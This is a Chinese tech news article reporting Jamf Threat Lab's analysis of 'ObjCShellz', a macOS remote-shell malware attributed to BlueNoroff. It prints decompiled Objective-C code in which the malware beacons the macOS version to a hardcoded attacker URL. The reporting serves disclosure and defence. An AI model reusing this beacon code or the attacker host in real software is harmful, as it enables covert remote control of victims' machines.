广告

苹果macOS新恶意软件曝光,可对设备进行远程访问和控制

2023-11-09 17:33:13 综合报道 阅读:
近日,网络安全公司Jamf Threat Lab发现了一款针对苹果Mac设备的新型恶意软件“ObjCShellz”。该恶意软件可以让攻击者对受感染的Mac设备进行远程访问和控制···

近日,网络安全公司Jamf Threat Lab发现了一款针对苹果Mac设备的新型恶意软件“ObjCShellz”。该恶意软件可以让攻击者对受感染的Mac设备进行远程访问和控制。grmednc

根据分析,该恶意软件是用Objective-C(一种扩充C的面向对象编程语言)编写的,是一个非常简单的远程 shell,可执行从攻击者服务器发送的 shell 命令。尽管尚不完全清楚初始访问是如何实现的,但该恶意软件很可能是用于入侵系统后手动运行命令的后期阶段。这种恶意软件与之前在其他攻击中使用的RustBucket(也是该黑客组织设计的软件)截然不同,但攻击者在这两种攻击情况中的重点似乎都是提供简单的远程shell功能。grmednc

具体来说,恶意软件执行后会调用名为sendRequest的函数,向硬编码的URL hXXp://swissborg.blog/zxcv/bnm发送POST消息。然后,恶意软件会使用Objective-C NSProcessInfo功能来获取有关恶意软件进程本身的信息。接着,它会检索operatingSystemVersionString以确定macOS版本,使用硬编码URL创建NSMutableURLRequest对象,并相应设置HTTP方法和头域。示例代码如下:grmednc

/* @class ProcessRequest */grmednc

-(void)sendRequest {grmednc

    rax = [NSProcessInfo processInfo];grmednc

    rax = [rax retain];grmednc

    var_58 = rax;grmednc

    rax = [rax operatingSystemVersionString];grmednc

    rax = [rax retain];grmednc

    r15 = rax;grmednc

    var_40 = rax;grmednc

    rax = [@"http://swissborg.b" stringByAppendingString:@"log/zxcv/bnm"];grmednc

    rax = [rax retain];grmednc

    var_50 = rax;grmednc

    rax = [NSURL URLWithString:rax];grmednc

    rax = [rax retain];grmednc

    var_48 = rax;grmednc

    rax = [NSMutableURLRequest requestWithURL:rax];grmednc

    rax = [rax retain];grmednc

    rbx = rax;grmednc

    [rax setHTTPMethod:@"POST"];grmednc

    [rbx setValue:@"application/json" forHTTPHeaderField:@"Content-Type"];grmednc

    rax = [NSString stringWithFormat:@"{\"sdf\":\"wsx\",\"info\":\"%@\"}", r15];grmednc

    rax = [rax retain];grmednc

    var_38 = rax;grmednc

    rax = [rax dataUsingEncoding:0x4];grmednc

    rax = [rax retain];grmednc

    var_30 = rax;grmednc

    [rbx setHTTPBody:rax];grmednc

    rax = [NSURLSession sharedSession];grmednc

    rax = [rax retain];grmednc

    r13 = [[rax dataTaskWithRequest:rbx completionHandler:^ {/* block implemented at ___29-[ProcessRequest sendRequest]_block_invoke */ } }] retain];grmednc

    [rax release];grmednc

    [r13 resume];grmednc

    [r13 release];grmednc

    return;grmednc

}grmednc

攻击成功后,受害者系统会发送如下的POST消息到攻击者的服务器:grmednc

grmednc

该恶意软件还会设置一个重复计时器,周期性的发送网络请求,让软件保持连续运行,从而持续对受害者的电脑进行远程的访问和控制。尽管这款软件的原理相当简单,但是非常的实用,可以很轻易的帮助攻击者实现其目标。grmednc

据悉,这款恶意软件是一种新的变体,由黑客组织BlueNoroff APT(Advanced Persistent Threat)创造,目前日本和美国都有报告此类攻击的信息,后续Jamf Threat Lab公司将会继续追踪其最新的攻击活动。grmednc

责编:Ricardo
  • 微信扫一扫
    一键转发
  • 最前沿的电子设计资讯
    请关注“电子技术设计微信公众号”
广告
热门推荐
广告
广告
广告
EE直播间
在线研讨会
广告
面包芯语
广告
向右滑动:上一篇 向左滑动:下一篇 我知道了